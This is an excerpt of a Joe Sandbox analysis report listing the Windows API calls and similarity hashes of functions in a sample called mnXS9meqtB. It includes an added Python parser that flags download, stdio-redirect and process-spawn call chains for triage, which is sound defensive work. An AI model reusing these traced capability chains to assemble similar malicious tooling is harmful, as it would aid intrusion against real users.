                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: c59bb3a6cff5022cd7194d8ae1c24af13b76e511c79be4d7d85fec86afab9cdf
                                                                            • Instruction ID: 165fc0fe105f3eeadbc4606daf71588a8e0f2b2adc21bc98a0bb8a0212b337c8
                                                                            • Opcode Fuzzy Hash: c59bb3a6cff5022cd7194d8ae1c24af13b76e511c79be4d7d85fec86afab9cdf
                                                                            • Instruction Fuzzy Hash: B0215E70600305ABEB229F25DC45B9B7BF8AF46724F204A5AF9A1DB2D0D770E944CF10
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00349653
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00349683
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00349694
                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003496CE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 50fd18be3e4be373c0dae5dfc912f7530721d8c99a5ee3d6c8ae513cadf8439f
                                                                            • Instruction ID: 18a8b1b4e93771488234a3350445e66ef808a7e4495b5494b9a7f0e017f2f77f
                                                                            • Opcode Fuzzy Hash: 50fd18be3e4be373c0dae5dfc912f7530721d8c99a5ee3d6c8ae513cadf8439f
                                                                            • Instruction Fuzzy Hash: 7F2171716003059BDB229F699C45F9B77ECAF95734F210A1AF8A1EB2E0D774AC41CB50
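Added example, not part of the Joe Sandbox report: a Python parser for the per-function records listed on this page (each "APIs" call list together with its "API ID", "String ID" and "Opcode ID" fields) that groups calls by function and flags call chains worth a closer look during triage. The embedded sample text is copied from three of this report's records with the memory-dump and hash lines trimmed; the CAPABILITIES table and its labels are this example's own heuristic, not a Joe Sandbox signature or anything the report states.

```python
"""Parse Joe Sandbox function-level API records and flag capability chains."""
import re
from dataclasses import dataclass, field

# Constructed sample: three records in the report's layout (memory-dump lines
# trimmed). In practice feed the report text as copied from the page.
SAMPLE = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00354401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00354427
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00354457
• InternetCloseHandle.WININET(00000000), ref: 0035449E
  • Part of subcall function 00355052: GetLastError.KERNEL32(?,?,003543CC,00000000,00000000,00000001), ref: 00355067
Strings
Similarity
• API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
• String ID:
• Opcode ID: 42e162c4940211fb774bab25605ad650b2aaf0b4a190ea46dd5fa6549f90adcc
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00349588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003495B9
• GetStdHandle.KERNEL32(0000000C), ref: 003495CB
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00349605
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• Opcode ID: c59bb3a6cff5022cd7194d8ae1c24af13b76e511c79be4d7d85fec86afab9cdf
APIs
• _memset.LIBCMT ref: 0036E33D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003C3D00,003C3D44), ref: 0036E37B
• CloseHandle.KERNEL32 ref: 0036E38D
Strings
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID: D=<
"""

# One API call line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional "(args)", then "ref: <address>".
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
FIELD_RE = re.compile(
    r"^\s*•\s*(API ID|String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*)$"
)

@dataclass
class Call:
    name: str
    module: str
    args: tuple
    ref: str
    subcall: bool  # True when reached only through a called sub-function

@dataclass
class Record:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def api_names(self):
        return {c.name for c in self.calls}

def parse_records(text):
    """Split the report text at each 'APIs' header and collect calls and fields."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Record()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            current.calls.append(Call(m["name"], m["module"], args, m["ref"], bool(m["sub"])))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m.group(1)] = m.group(2).strip()
    return records

# Triage heuristic of this example (hypothetical labels, not report content):
# a capability applies when every listed API appears in the same function.
CAPABILITIES = {
    "http_download": {"InternetOpenUrlW", "HttpSendRequestW", "HttpQueryInfoW"},
    "stdio_redirect": {"GetStdHandle", "CreatePipe", "CreateFileW"},
    "process_spawn": {"CreateProcessW"},
}

def capabilities(record):
    names = record.api_names()
    found = {cap for cap, need in CAPABILITIES.items() if need <= names}
    # stdio_redirect also requires CreateFileW to open the NUL device (first argument).
    if "stdio_redirect" in found and not any(
        c.name == "CreateFileW" and c.args and c.args[0].lower() == "nul" for c in record.calls
    ):
        found.discard("stdio_redirect")
    return found

def triage(text):
    """Map each flagged record (by Opcode ID, or record index if absent) to its capabilities."""
    out = {}
    for i, rec in enumerate(parse_records(text)):
        caps = capabilities(rec)
        if caps:
            out[rec.fields.get("Opcode ID", f"record{i}")] = sorted(caps)
    return out

if __name__ == "__main__":
    for key, caps in triage(SAMPLE).items():
        print(key, caps)
```

Keying results by Opcode ID lets the same flagged function be recognised across reports of repacked samples, since that hash covers the function's opcodes rather than its addresses.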
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0034DB0A
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0034DB5E
                                                                            • __swprintf.LIBCMT ref: 0034DB77
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0039DC00), ref: 0034DBB5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu
                                                                            • API String ID: 3164766367-685833217
                                                                            • Opcode ID: 2f9f4d045bd5f610fae15800a1ceec8168d92572bf8b9b6d5b42fa8d2670193e
                                                                            • Instruction ID: 7d4c248252e5444b1b4c9038e68df56b80576f12d6f884af5965538e65d87a71
                                                                            • Opcode Fuzzy Hash: 2f9f4d045bd5f610fae15800a1ceec8168d92572bf8b9b6d5b42fa8d2670193e
                                                                            • Instruction Fuzzy Hash: 61216535600208AFCB12EFA4DD95DEEBBF8EF89704B1040A9F505DB291DB71EA41CB61
                                                                            APIs
                                                                              • Part of subcall function 0033C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0033C84A
                                                                              • Part of subcall function 0033C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0033C85D
                                                                              • Part of subcall function 0033C82D: GetCurrentThreadId.KERNEL32 ref: 0033C864
                                                                              • Part of subcall function 0033C82D: AttachThreadInput.USER32(00000000), ref: 0033C86B
                                                                            • GetFocus.USER32 ref: 0033CA05
                                                                              • Part of subcall function 0033C876: GetParent.USER32(?), ref: 0033C884
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0033CA4E
                                                                            • EnumChildWindows.USER32(?,0033CAC4), ref: 0033CA76
                                                                            • __swprintf.LIBCMT ref: 0033CA90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                            • String ID: %s%d
                                                                            • API String ID: 3187004680-1110647743
                                                                            • Opcode ID: 865c95c5fbc8eb9ebc97b6d521fb2b434568459bd5fc33d4723943fbc32ad7d0
                                                                            • Instruction ID: d40aa8d59ee3b179faaff6a73c642b86ff50c4ba20d529a3d7f7a8e7091e915b
                                                                            • Opcode Fuzzy Hash: 865c95c5fbc8eb9ebc97b6d521fb2b434568459bd5fc33d4723943fbc32ad7d0
                                                                            • Instruction Fuzzy Hash: 29113DB16102096ADF13BFA49CC6FEA376CAB44714F009066FA09BE186DB709A45DB70
                                                                            APIs
                                                                            • __lock.LIBCMT ref: 00327AD8
                                                                              • Part of subcall function 00327CF4: __mtinitlocknum.LIBCMT ref: 00327D06
                                                                              • Part of subcall function 00327CF4: EnterCriticalSection.KERNEL32(00000000,?,00327ADD,0000000D), ref: 00327D1F
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 00327AE5
                                                                            • __lock.LIBCMT ref: 00327AF9
                                                                            • ___addlocaleref.LIBCMT ref: 00327B17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                            • String ID: `8
                                                                            • API String ID: 1687444384-1718026360
                                                                            • Opcode ID: 79bef1fd3eb8ffcac32ebe68ab5af7e38ec675aa857aaeeadad4100421bfd823
                                                                            • Instruction ID: 7d91dccaaeffd34341398e608b4bd471097632a6883a9076e74cecbacb59b49f
                                                                            • Opcode Fuzzy Hash: 79bef1fd3eb8ffcac32ebe68ab5af7e38ec675aa857aaeeadad4100421bfd823
                                                                            • Instruction Fuzzy Hash: AC018075504B10DFD722EF75E90674AB7F0FF40325F20894EE49A9B6A0CBB0A644CB41
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0036E33D
                                                                            • _memset.LIBCMT ref: 0036E34C
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003C3D00,003C3D44), ref: 0036E37B
                                                                            • CloseHandle.KERNEL32 ref: 0036E38D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                            • String ID: D=<
                                                                            • API String ID: 3277943733-3444951095
                                                                            • Opcode ID: 427926ce329c806472024fec45aa38ae41d71cd671075171f96a0d17ad847f1b
                                                                            • Instruction ID: e7a5603b1815b3df4dd13d04811c014ad59210c4204803e42883563de1d7afc0
                                                                            • Opcode Fuzzy Hash: 427926ce329c806472024fec45aa38ae41d71cd671075171f96a0d17ad847f1b
                                                                            • Instruction Fuzzy Hash: 04F05EF5540314BAE2122B60AC49FB77E6CDB04754F008421BE0ADA1A2D375AE0087A8
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003619F3
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00361A26
                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00361B49
                                                                            • CloseHandle.KERNEL32(?), ref: 00361BBF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                            • String ID:
                                                                            • API String ID: 2364364464-0
                                                                            • Opcode ID: 35ed793cde9354d5bf674b227f73ef04783daade55daf9efab0ca2e10ed171d7
                                                                            • Instruction ID: 1edbe5bfef3de656120dd216784d7ea5412ab213e612efb14976147223a0715b
                                                                            • Opcode Fuzzy Hash: 35ed793cde9354d5bf674b227f73ef04783daade55daf9efab0ca2e10ed171d7
                                                                            • Instruction Fuzzy Hash: 64816370600204ABDF16DF64C896BAEBBE5AF08720F18C459F905AF3D6D7B5A9418B90
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0036E1D5
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0036E20D
                                                                            • IsDlgButtonChecked.USER32(?,00000001), ref: 0036E248
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0036E269
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0036E281
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ButtonCheckedLongWindow
                                                                            • String ID:
                                                                            • API String ID: 3188977179-0
                                                                            • Opcode ID: 1143a17575ffcecfe6676c6c907c51c9250e33e0f2d73262d10b07972dc08253
                                                                            • Instruction ID: 8e5e6664a5db318975a2009dd69fe621de5917c1420ee1d87f6ac03926d5b6e7
                                                                            • Opcode Fuzzy Hash: 1143a17575ffcecfe6676c6c907c51c9250e33e0f2d73262d10b07972dc08253
                                                                            • Instruction Fuzzy Hash: 3861A238600204AFDB22CF58C894FAAB7BAEF4A300F158059F9599B3A5C771AD59DB10
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00341CB4
                                                                            • VariantClear.OLEAUT32(00000013), ref: 00341D26
                                                                            • VariantClear.OLEAUT32(00000000), ref: 00341D81
                                                                            • VariantClear.OLEAUT32(?), ref: 00341DF8
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00341E26
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                            • String ID:
                                                                            • API String ID: 4136290138-0
                                                                            • Opcode ID: de1991aa60039a096608f73995f8a9f59a74352db7e30895f51038ca6a522447
                                                                            • Instruction ID: 4e26481361aad3e993cb65f015b7cce2427dc0fcc25851688bcdd3887e6376ee
                                                                            • Opcode Fuzzy Hash: de1991aa60039a096608f73995f8a9f59a74352db7e30895f51038ca6a522447
                                                                            • Instruction Fuzzy Hash: DE5147B5A00209AFDB15CF58C880AAAB7F9FF4D314B158559ED59DB340E730EA51CFA0
                                                                            APIs
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003606EE
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0036077D
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0036079B
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 003607E1
                                                                            • FreeLibrary.KERNEL32(00000000,00000004), ref: 003607FB
                                                                              • Part of subcall function 0031E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0034A574,?,?,00000000,00000008), ref: 0031E675
                                                                              • Part of subcall function 0031E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0034A574,?,?,00000000,00000008), ref: 0031E699
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 327935632-0
                                                                            • Opcode ID: c6509299cbed0897fb310badcbe1875e830d6c9df7b5382775b404a0f78119b9
                                                                            • Instruction ID: 26f0f3f6a7ea2d15f08d4e3485c62eaa48a0e89b591343c87c2eb282bebe2380
                                                                            • Opcode Fuzzy Hash: c6509299cbed0897fb310badcbe1875e830d6c9df7b5382775b404a0f78119b9
                                                                            • Instruction Fuzzy Hash: 3F515A75A01205DFCB0AEFA8C895DAEB7F9BF18310B05C095E956AB392DB30ED45CB40
                                                                            APIs
                                                                              • Part of subcall function 00363C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00362BB5,?,?), ref: 00363C1D
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00362EEF
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00362F2E
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00362F75
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00362FA1
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00362FAE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 3740051246-0
                                                                            • Opcode ID: 2a29ea8eb36dc135a448cff4ba66da40950b6e4fa863d40c9ae9f52532619eff
                                                                            • Instruction ID: 19c4ca335a3863e953134e70833742eb39c0d05d91dbaa561ee312002d88df9c
                                                                            • Opcode Fuzzy Hash: 2a29ea8eb36dc135a448cff4ba66da40950b6e4fa863d40c9ae9f52532619eff
                                                                            • Instruction Fuzzy Hash: F7516771218204AFC706EF64C891EABB7F8FF88704F00896DF5959B2A1DB70E904CB52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fa3f62d58f894970b7934be6126b53cc8911e8b47ea65fde192db8aa525fdde6
                                                                            • Instruction ID: 7a12a49da34288837cba7cb61578120fcb390fbbc11d0e1db05a4765b18e6709
                                                                            • Opcode Fuzzy Hash: fa3f62d58f894970b7934be6126b53cc8911e8b47ea65fde192db8aa525fdde6
                                                                            • Instruction Fuzzy Hash: 1341C139910204ABC722DF68CC48FB9BB78EB09310F169265F999E72E5C671AD11DB90
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003512B4
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003512DD
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0035131C
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00351341
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00351349
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1389676194-0
                                                                            • Opcode ID: 18275ddf60b0e9fa37358794cb6b57bb6c6e10a748a18054e841cfda73653fde
                                                                            • Instruction ID: 5ecadbf6cee447f1267b0dfe0dde5fb25c9e3b05906ac44b2df518a6199088dc
                                                                            • Opcode Fuzzy Hash: 18275ddf60b0e9fa37358794cb6b57bb6c6e10a748a18054e841cfda73653fde
                                                                            • Instruction Fuzzy Hash: 8F410A39600205DFCB06EF64C991AAEBBF5EF08310B148095E946AF3A2DB31ED51DF50
                                                                            APIs
                                                                            • GetCursorPos.USER32(000000FF), ref: 0031B64F
                                                                            • ScreenToClient.USER32(00000000,000000FF), ref: 0031B66C
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 0031B691
                                                                            • GetAsyncKeyState.USER32(00000002), ref: 0031B69F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
